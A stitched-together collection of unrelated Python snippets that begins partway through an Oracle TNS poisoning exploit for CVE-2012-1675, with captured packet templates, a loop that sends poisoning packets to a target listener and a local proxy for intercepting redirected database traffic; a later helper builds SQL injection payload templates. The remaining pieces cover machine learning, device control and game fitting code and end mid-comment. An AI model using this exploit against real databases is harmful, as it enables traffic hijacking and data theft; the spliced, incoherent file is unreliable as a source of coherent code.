)\x00\x01\x00\x00\x00\x0f\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00X\x8c\xff\x1f\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x000\x8c\xff\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xa7k\x0c\x00\x00\x00\x00orcl1234567XDB\x00\x0f\x00\x00\x00\x00\x00\x00\x00X\x8c\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fk\x0c\x00\x00\x00\x00orcl1234567XDB\x00\x01\x00\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00(\xcf\xaa%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa6k\x0c\x00\x00\x00\x00orcl1234567\x00\x0c\x00\x00\x00\x00\x00\x00\x00(\xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc"\x0b\x00\x00\x00\x00orcl1234567\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc0R\x84%\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00Pf?\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa9k\x0c\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xc0R\x84%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xa5k\x0c\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa8\x97k\x0c\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90f?\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xa7k\x0c\x00\x00\x00\x00\xfa\xa3\xbc\x0b\xde\xc7K\x1c\xb4-\x93\x1b\x13rM\xa2\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xc0\x91\x94%\xff\x07\x00\x000\x00\x00\x00\x00\x00\x00\x00\xfcf?\x0c\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\x00\x8c\xff\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x97k\x0c\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49214))\x00DISPATCHER <machine: 192.168.133.1 , pid: 424>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb"\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99"\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\x93\x83Dr_L\xf4\x95\x99\x9b\xde\xf0\x0b<\x8d0\x8c\xff\x1f\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00pE\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x03\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00P\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb"\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x0f\x00\x00\x00\x00\x00\x00\x00X\x8c\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fk\x0c\x00\x00\x00\x00orcl1234567XDB\x00\x00\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00(\xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc"\x0b\x00\x00\x00\x00orcl1234567\x00'
PACKET_TNSPOISON_SID_12 = b'\x05\xc2\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\xb8$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xb0\xe9I\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5*\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00D\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xa8H\x0b\x00\x00\x00\x003\x168s\x02jE\xe5\xbe\xd1\xbag\xce\xdc\xc6\x05\r\x00\x00\x00\x00\x00\x00\x00\xc0E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02D\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5*\x0b\x00\x00\x00\x00orcl\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xf8\xd3\xf2\x1f\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xd3\xf2\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00H\xa7H\x0b\x00\x00\x00\x00orclXDB\x00\x10\x00\x00\x00\x00\x00\x00\x00\xf8\xd3\xf2\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fH\x0b\x00\x00\x00\x00orclXDB\x00\x01\x00\x00\x00\r\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 \xcf\xaa%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xf8\xce\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xa6H\x0b\x00\x00\x00\x00orcl\x00\r\x00\x00\x00\x00\x00\x00\x00 \xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc*\x0b\x00\x00\x00\x00orcl\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0_\xf1\x1f\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfD\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xa9H\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xb0_\xf1\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xa5H\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe8\x97H\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fD\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa8H\x0b\x00\x00\x00\\xfa\xe7:\x1b{B\x95\xb0\xb6\x840e\xb0\xc0\x01\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xb8\x91\x94%\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfD\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xb09\xea\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x97H\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49218))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2480>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb*\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99*\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00v\xeeK\xd5_#\x8fHa\xb3\xd5\x8d\xccQ\xd0\xd3\xf2\x1f\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00hE\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x03\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00H\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb*\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x10\x00\x00\x00\x00\x00\x00\x00\xf8\xd3\xf2\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fH\x0b\x00\x00\x00\x00orclXDB\x00\xf8\xce\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x00\x00\x00\x00 \xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc*\x0b\x00\x00\x00\x00orcl\x00'
DEFAULT_LOCAL_IP_PACKET_TNSPOISON = b'192.168.133.1 '
DEFAULT_TARGET_PORT_PACKET_TNSPOISON = b'1521'
DEFAULT_LOCAL_PORT_PACKET_TNSPOISON = b'9999'
DEFAULT_SID_PACKET_TNSPOISON_SID_2 = b'or'
DEFAULT_SID_PACKET_TNSPOISON_SID_3 = b'orc'
DEFAULT_SID_PACKET_TNSPOISON_SID_4 = b'orcl'
DEFAULT_SID_PACKET_TNSPOISON_SID_5 = b'orcl1'
DEFAULT_SID_PACKET_TNSPOISON_SID_6 = b'orcl12'
DEFAULT_SID_PACKET_TNSPOISON_SID_7 = b'orcl123'
DEFAULT_SID_PACKET_TNSPOISON_SID_8 = b'orcl1234'
DEFAULT_SID_PACKET_TNSPOISON_SID_9 = b'orcl12345'
DEFAULT_SID_PACKET_TNSPOISON_SID_10 = b'orcl123456'
DEFAULT_SID_PACKET_TNSPOISON_SID_11 = b'orcl1234567'
DEFAULT_SID_PACKET_TNSPOISON_SID_12 = b'orcl'
GOOD_STRINGS_IN_TNS_POISON_RESPONSE = [b'XDB', b'xdb']
def __init__(self, args):
logging.debug('Tnspoison object created')
Tnscmd.__init__(self, args)
def isTNSListenerVulnerableToCVE_2012_1675(self):
if (self.args['sid'] == None):
logging.info('SID is not given. Impossible to check if target is vulnerable to TNS poisoning')
return (- 1)
return self.exploitTNSPoisoningAttack(checkOnly=True)
def __sendTNSpoisoningPackets__(self, localIp, localListeningPort=DEFAULT_LOCAL_LISTENING_PORT_TNS_POISON):
poisonPacket = ''
logging.debug('Making the TNS poisoning packet...')
sidLength = len(self.args['sid'])
if ((sidLength < 2) or (sidLength > 12)):
logging.warning('The SID is too short or too long. SID should be >=2 and <=12')
return (- 2)
logging.debug('SID of {0} chars long, sending the good poisoning packet...'.format(sidLength))
# each supported SID length (2 to 12) has its own captured packet template and placeholder SID
poisonPacket = getattr(self, 'PACKET_TNSPOISON_SID_{0}'.format(sidLength))
defaultSid = getattr(self, 'DEFAULT_SID_PACKET_TNSPOISON_SID_{0}'.format(sidLength))
poisonPacket = poisonPacket.replace(defaultSid, self.args['sid'].encode())
poisonPacket = poisonPacket.replace(self.DEFAULT_LOCAL_IP_PACKET_TNSPOISON, localIp.ljust(15, ' ').encode())
poisonPacket = poisonPacket.replace(self.DEFAULT_LOCAL_PORT_PACKET_TNSPOISON, str(localListeningPort).encode())
poisonPacket = poisonPacket.replace(self.DEFAULT_TARGET_PORT_PACKET_TNSPOISON, str(self.args['port']).encode())
while 1:
logging.info('Exploiting the TNS poisoning attack...')
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.connect((self.args['server'], int(self.args['port'])))
logging.debug('Sending a REGISTER packet from your IP {2} to the TNS listener {0}:{1}...'.format(self.args['server'], self.args['port'], localIp))
sk.send(self.PACKET_REGISTER)
if (self.args['show_sql_requests'] == True):
logging.debug('REGISTER packet sent: {0}'.format(repr(self.PACKET_REGISTER)))
response = sk.recv(8192)
if (self.args['show_sql_requests'] == True):
logging.debug('Packet received: {0}'.format(repr(response)))
sk.send(poisonPacket)
if (self.args['show_sql_requests'] == True):
logging.debug('Poisoning packet sent: {0}'.format(repr(poisonPacket)))
response = sk.recv(8192)
if (self.args['show_sql_requests'] == True):
logging.debug('Packet received: {0}'.format(repr(response)))
for aString in self.GOOD_STRINGS_IN_TNS_POISON_RESPONSE:
if (aString in response):
logging.debug('Response sent by database server considered as good. Continue to send TNS poisoning packets')
break
logging.info('Sleeping {0} secs'.format(DEFAULT_SLEEPING_TIME_TNS_POISON))
sleep(DEFAULT_SLEEPING_TIME_TNS_POISON)
sk.close()
def __startProxy__(self, localIp, localPort, connectionString=None, replaceStr=[None, None]):
logging.debug('The local proxy will listen on {0}:{1} and it will redirect traffic to {2}:{3}'.format(localIp, localPort, self.args['server'], self.args['port']))
forwarder(ip=localIp, port=localPort, args=self.args, connectionString=connectionString, replaceStr=replaceStr)
asyncore.loop()
def exploitTNSPoisoningAttack(self, checkOnly=False):
ERROR_STR = ['(ERROR_STACK=(ERROR=', '(DESCRIPTION=(ERR=']
logging.info('Checking if the target is vulnerable to TNS poisoning attack...')
status = self.getInformation(cmd='service_register_NSGR')
if (status == False):
logging.debug('Unknown error with the TNS command sent')
return (- 1)
else:
for anError in ERROR_STR:
if (anError in self.recvdata):
logging.debug("'{0}' in target's response after registration command: not vulnerable".format(ERROR_STR))
return False
else:
logging.debug('Target is vulnerable to CVE-2012-1675 because there is no error in the response after the registration command')
if (checkOnly == True):
return True
else:
localListeningPort = int(self.args['listening-port'])
logging.debug('Starting the local proxy on {0}:{1} in a new thread'.format(self.localIP, localListeningPort))
a = Thread(None, self.__startProxy__, None, (), {'localIp': self.localIP, 'localPort': localListeningPort, 'connectionString': self.args['cstring'], 'replaceStr': self.args['replace']})
a.daemon = True
a.start()
logging.debug('Waiting 3 seconds while the proxy is starting')
sleep(3)
logging.debug('Starting TNS poisoning in a new thread...')
b = Thread(None, self.__sendTNSpoisoningPackets__, None, (), {'localIp': self.localIP, 'localListeningPort': localListeningPort})
b.daemon = True
b.start()
try:
while 1:
sleep(self.args['sleeptime'])
except KeyboardInterrupt:
logging.info('Keyboard Interrupt => attack stopped')
return True
def testAll(self):
self.args['print'].title('Is it vulnerable to TNS poisoning (CVE-2012-1675)?')
status = self.isTNSListenerVulnerableToCVE_2012_1675()
if (status == None):
self.args['print'].unknownNews('Impossible to know if target is vulnerable to a remote TNS poisoning because of an error.')
elif (status == (- 1)):
self.args['print'].unknownNews('Impossible to know if target is vulnerable to a remote TNS poisoning because SID is not given.')
elif (status == True):
self.args['print'].goodNews('The target is vulnerable to a remote TNS poisoning')
else:
self.args['print'].badNews('The target is not vulnerable to a remote TNS poisoning') |
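# The SID, local IP and port fields inside the capture blobs above are fixed
# placeholders that __sendTNSpoisoningPackets__ patches byte-for-byte before
# sending. A toy illustration of the same substitution scheme on a made-up
# template (hypothetical values, not a real TNS packet):
template = b'(CONNECT_DATA=(SID=orcl)(HOST=192.168.133.1 )(PORT=1521))'
patched = template.replace(b'orcl', b'mydb')
patched = patched.replace(b'192.168.133.1 ', '10.0.0.5'.ljust(15, ' ').encode())  # pad the IP field as the real code does
patched = patched.replace(b'1521', b'1599')
assert ((b'(SID=mydb)' in patched) and (b'(PORT=1599)' in patched))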
def session(device):
with tf.device(device):
graph = tf.Graph()
with graph.as_default():
model = tf.keras.Sequential((tf.keras.layers.Conv2D(32, kernel_size=3, input_shape=(28, 28, 3), activation='relu'), tf.keras.layers.Conv2D(64, kernel_size=3)))
init = tf.compat.v1.global_variables_initializer()
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True  # allocate GPU memory on demand instead of reserving it all up front
sess = tf.compat.v1.Session(graph=graph, config=config)
sess.run(init)
# stash zeroed counters on the session object (BNF, CLE and ADA are names defined elsewhere in the module)
sess.__setattr__(BNF, 0)
sess.__setattr__(CLE, 0)
sess.__setattr__(ADA, 0)
return sess |
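# Usage sketch (illustrative device strings; BNF, CLE and ADA must be defined
# in the enclosing module before session() can run):
# sess = session('/cpu:0')
# sess = session('/device:GPU:0')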
class AttributeDevice(Switch):
EVENT_TYPE_ATTRIBUTE_LIST = 'attributeList'
_state_property: str
_attr_name = '_attributes'
def __init__(self, *args: Any, **kwargs: Any) -> None:
assert isinstance(self._state_property, str)
setattr(self, self._attr_name, {})
class_hints = get_type_hints(type(self))
assert ((attr_type := class_hints.get(self._attr_name)) is not None)
self._attribute_type_hints = get_type_hints(attr_type)
super().__init__(*args, **kwargs)
self.update_attributes()
@property
def _required_services(self) -> list[RequiredService]:
return (super()._required_services + [RequiredService(name='deviceevent', actions=['GetAttributes', 'SetAttributes'])])
def _update_attributes_dict(self, xml_blob: str) -> None:
xml_blob = (('<attributes>' + xml_blob) + '</attributes>')
xml_blob = xml_blob.replace('&gt;', '>')
xml_blob = xml_blob.replace('&lt;', '<')
for attribute in et.fromstring(xml_blob, parser=et.XMLParser(resolve_entities=False)):
if (len(attribute) < 2):
raise ValueError(f'Too few elements: {et.tostring(attribute).decode()}')
if ((key := attribute[0].text) is None):
raise ValueError(f'Key is not present: {et.tostring(attribute[0]).decode()}')
if ((value := attribute[1].text) is None):
raise ValueError(f'Value is not present: {et.tostring(attribute[1]).decode()}')
if ((constructor := self._attribute_type_hints.get(key)) is None):
continue
try:
getattr(self, self._attr_name)[key] = constructor(value)
except (TypeError, ValueError) as err:
raise ValueError(f'Unexpected value for {key}: {value}') from err
state: (int | None) = getattr(self, self._state_property)
self._state = state
def update_attributes(self) -> None:
resp = self.deviceevent.GetAttributes().get(self.EVENT_TYPE_ATTRIBUTE_LIST)
assert (resp is not None)
self._update_attributes_dict(resp)
def subscription_update(self, _type: str, _params: str) -> bool:
if (_type == self.EVENT_TYPE_ATTRIBUTE_LIST):
try:
self._update_attributes_dict(_params)
except (et.XMLSyntaxError, ValueError) as err:
LOG.error('Unexpected %s value `%s` for device %s: %s', self.EVENT_TYPE_ATTRIBUTE_LIST, _params, self.name, repr(err))
return True
return super().subscription_update(_type, _params)
def get_state(self, force_update: bool=False) -> int:
if (force_update or (self._state is None)):
self.update_attributes()
assert (self._state is not None)
return self._state
def _set_attributes(self, *args: tuple[(str, ((str | int) | float))]) -> None:
attribute_xml = '</attribute><attribute>'.join((f'<name>{name}</name><value>{value}</value>' for (name, value) in args))
attribute_xml = f'<attribute>{attribute_xml}</attribute>'
self.deviceevent.SetAttributes(attributeList=quote_xml(attribute_xml))
self.get_state(True) |
def resolve_file(filename, relroot=None):
resolved = os.path.normpath(filename)
resolved = os.path.expanduser(resolved)
if (not os.path.isabs(resolved)):
if (not relroot):
relroot = os.getcwd()
elif (not os.path.isabs(relroot)):
raise NotImplementedError(relroot)
resolved = os.path.join(relroot, resolved)
return resolved |
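# Usage sketch for resolve_file above (assumed in scope): relative paths are
# anchored at relroot (falling back to the current directory), '~' is expanded,
# and absolute inputs pass through normalized.
import os
print(resolve_file('~/notes.txt'))
print(resolve_file('src/main.c', relroot='/tmp/build'))  # -> /tmp/build/src/main.c
assert os.path.isabs(resolve_file('anything.txt')) |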
def sa_scaffold_hop() -> GoalDirectedBenchmark:
specification = uniform_specification(1, 10, 100)
benchmark_object = scaffold_hop()
sa_biased = ScoringFunctionSAWrapper(benchmark_object.objective, SAScoreModifier())
return GoalDirectedBenchmark(name='SA_scaffold_hop', objective=sa_biased, contribution_specification=specification) |
class FitEcmBurstScanresDampsGraph(FitGraph):
hidden = True
internalName = 'ecmBurstScanresDamps'
name = 'ECM Burst + Scanres Damps'
xDefs = [XDef(handle='tgtDps', unit=None, label='Enemy DPS', mainInput=('tgtDps', None)), XDef(handle='tgtScanRes', unit='mm', label='Enemy scanres', mainInput=('tgtScanRes', 'mm'))]
yDefs = [YDef(handle='srcDmg', unit=None, label='Damage inflicted'), YDef(handle='tgtLockTime', unit='s', label='Lock time'), YDef(handle='tgtLockUptime', unit='s', label='Lock uptime')]
inputs = [Input(handle='tgtScanRes', unit='mm', label='Enemy scanres', iconID=74, defaultValue=700, defaultRange=(100, 1000)), Input(handle='tgtDps', unit=None, label='Enemy DPS', iconID=1432, defaultValue=200, defaultRange=(100, 600)), Input(handle='uptimeAdj', unit='s', label='Uptime adjustment', iconID=1392, defaultValue=1, defaultRange=(None, None), conditions=[(None, ('srcDmg', None))]), Input(handle='uptimeAmtLimit', unit=None, label='Max amount of uptimes', iconID=1397, defaultValue=3, defaultRange=(None, None), conditions=[(None, ('srcDmg', None))])]
checkboxes = [InputCheckbox(handle='applyDamps', label='Apply sensor dampeners', defaultValue=True), InputCheckbox(handle='applyDrones', label='Use drones', defaultValue=True, conditions=[(None, ('srcDmg', None))])]
srcExtraCols = ('SigRadius', 'Damp ScanRes')
_limiters = {'tgtScanRes': (lambda src, tgt: (1, math.inf))}
_getters = {('tgtScanRes', 'tgtLockTime'): TgtScanRes2TgtLockTimeGetter, ('tgtScanRes', 'tgtLockUptime'): TgtScanRes2TgtLockUptimeGetter, ('tgtScanRes', 'srcDmg'): TgtScanRes2SrcDmgGetter, ('tgtDps', 'srcDmg'): TgtDps2SrcDmgGetter} |
class Image_Dataset(object):
def __init__(self, image_dir, transform=None, image_ext=['.jpg', '.bmp', '.png']):
assert (transform is not None)
self._transform = transform
self.image_dir = image_dir
self.image_ext = image_ext
self._read_dataset()
def __getitem__(self, index):
assert (index < self._dataset_size)
image = None
label = None
img_path = self._data['path'][index]
image = Image.open(img_path).convert('RGB')
frame_ids = self._data['frames_ids'][index]
image = self._transform(image)
sample = {'image': image, 'path': img_path, 'index': index, 'frames_ids': frame_ids}
return sample
def _read_dataset(self):
frames_paths = glob.glob(os.path.join(self.image_dir, '*'))
frames_paths = [x for x in frames_paths if any([(ext in x) for ext in self.image_ext])]
frames_paths = sorted(frames_paths, key=(lambda x: int(os.path.basename(x).split('.')[0].split('_')[(- 1)])))
self._data = {'path': frames_paths, 'frames_ids': [int(os.path.basename(p).split('.')[0].split('_')[(- 1)]) for p in frames_paths]}
self._ids = np.arange(len(self._data['path']))
self._dataset_size = len(self._ids)
def __len__(self):
return self._dataset_size |
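# Standalone sketch of the sort key used by Image_Dataset._read_dataset above:
# frames named like 'clip_2.png' are ordered by their numeric suffix rather than
# lexicographically (which would place 'clip_10' before 'clip_2').
import os
paths = ['frames/clip_10.png', 'frames/clip_2.png', 'frames/clip_1.png']
key = lambda x: int(os.path.basename(x).split('.')[0].split('_')[-1])
print(sorted(paths, key=key))  # clip_1, clip_2, clip_10
print(sorted(paths))  # lexicographic: clip_1, clip_10, clip_2 |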
def clean_up_offset_payload(payload):
if ('0,' in payload):
payload = '{index},'.join(payload.rsplit('0,'))
if ('OFFSET' in payload):
payload = 'OFFSET {index} '.join(payload.rsplit('OFFSET 0'))
if ('DB_NAME' in payload):
payload = payload.replace('DB_NAME(0)', 'DB_NAME({index})')
if ('TOP 0' in payload):
payload = 'TOP {index}'.join(payload.rsplit('TOP 0'))
logger.debug(payload)
return payload |
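# Sketch of how the template produced by clean_up_offset_payload above is meant
# to be consumed (the function and its module-level logger assumed in scope);
# the SQL here is only an illustrative payload.
raw = 'SELECT name FROM sysobjects ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY'
template = clean_up_offset_payload(raw)  # 'OFFSET 0' -> 'OFFSET {index} '
for index in range(3):
    print(template.format(index=index))  # one payload per row index |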
def ignore_exceptions(func):
assert asyncio.iscoroutinefunction(func), 'func needs to be a coroutine'
async def wrapper(*args, **kwargs):
try:
return (await func(*args, **kwargs))
except asyncio.CancelledError:
raise
except Exception:
# deliberately swallow everything except CancelledError, which is re-raised above
pass
return wrapper |
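# Usage sketch for the ignore_exceptions decorator above (assumed in scope):
# ordinary exceptions are swallowed and the wrapper returns None, while
# CancelledError is re-raised so task cancellation still works.
import asyncio

@ignore_exceptions
async def flaky():
    raise RuntimeError('boom')

async def main():
    assert (await flaky()) is None  # the RuntimeError never escapes
    print('exception swallowed')

asyncio.run(main()) |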
def main():
args = parse_args()
cfg = get_cfg(args)
cudnn.benchmark = True
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = os.path.join(cfg.work_dir, f'{timestamp}.cfg')
with open(log_file, 'a') as f:
f.write(cfg.pretty_text)
logger = build_logger(cfg.work_dir, cfgname='train_source')
writer = SummaryWriter(log_dir=os.path.join(cfg.work_dir, 'tensorboard'))
loader_dict = {}
train_set = build_dataset(cfg.data.train)
val_set = build_dataset(cfg.data.val)
loader_dict['src_train'] = DataLoader(train_set, batch_size=cfg.batch_size, shuffle=True, num_workers=cfg.num_workers, drop_last=True)
loader_dict['src_val'] = DataLoader(val_set, batch_size=cfg.batch_size, shuffle=True, num_workers=cfg.num_workers, drop_last=False)
print('==> DataLoader built.')
model = build_model(cfg.model)
nn.init.xavier_normal_(model.fc.weight)
model = torch.nn.DataParallel(model).cuda()
train_criterion = build_loss(cfg.loss.train).cuda()
val_criterion = build_loss(cfg.loss.val).cuda()
base_params = [v for (k, v) in model.named_parameters() if ('fc' not in k)]
head_params = [v for (k, v) in model.named_parameters() if ('fc' in k)]
param_groups = [{'params': base_params, 'lr': (cfg.lr * 0.1)}, {'params': head_params, 'lr': cfg.lr}]
optimizer = build_optimizer(cfg.optimizer, param_groups)
for param_group in optimizer.param_groups:
param_group['init_lr'] = param_group['lr']
print('==> Model built.')
print('==> Start training...')
model.train()
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
val_meter = TrackMeter()
start_iter = 1
train_iters = (cfg.epochs * len(loader_dict['src_train']))
val_interval = len(loader_dict['src_train'])
end = time.time()
iter_source = iter(loader_dict['src_train'])
for it in range(start_iter, (train_iters + 1)):
adjust_lr(optimizer, it, train_iters, power=0.75)
try:
(images, labels) = next(iter_source)
except StopIteration:
iter_source = iter(loader_dict['src_train'])
(images, labels) = next(iter_source)
images = images.cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
bsz = images.shape[0]
targets = torch.zeros(bsz, cfg.num_classes).cuda().scatter_(1, labels.view((- 1), 1), 1)
targets = (((1 - cfg.eps) * targets) + (cfg.eps / cfg.num_classes))
output = model(images)
loss = train_criterion(output, targets)
losses.update(loss.item(), bsz)
(acc1, acc5) = accuracy(output, labels, topk=(1, 5))
top1.update(acc1[0], bsz)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_time.update((time.time() - end))
end = time.time()
if ((it == start_iter) or ((it % cfg.log_interval) == 0)):
lr = optimizer.param_groups[0]['lr']
logger.info(f'Iter [{it}/{train_iters}] - batch_time: {batch_time.avg:.3f}, lr: {lr:.5f}, loss: {losses.avg:.3f}, train_acc: {top1.avg:.2f}')
writer.add_scalar('lr', lr, it)
writer.add_scalar('Loss/src_train', losses.avg, it)
writer.add_scalar('Acc/src_train', top1.avg, it)
if (((it % val_interval) == 0) or (it == train_iters)):
val_acc = val(loader_dict['src_val'], model, val_criterion, it, logger, writer)
if (val_acc >= val_meter.max_val):
model_path = os.path.join(cfg.work_dir, 'best_val.pth')
state_dict = {'optimizer_state': optimizer.state_dict(), 'model_state': model.state_dict(), 'iter': it}
torch.save(state_dict, model_path)
val_meter.update(val_acc, idx=it)
logger.info(f'Best val_acc: {val_meter.max_val:.2f} (iter={val_meter.max_idx}).')
model.train()
model_path = os.path.join(cfg.work_dir, 'last.pth')
state_dict = {'optimizer_state': optimizer.state_dict(), 'model_state': model.state_dict(), 'iter': train_iters}
torch.save(state_dict, model_path) |
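# Standalone sketch of the label-smoothing targets built in the training loop
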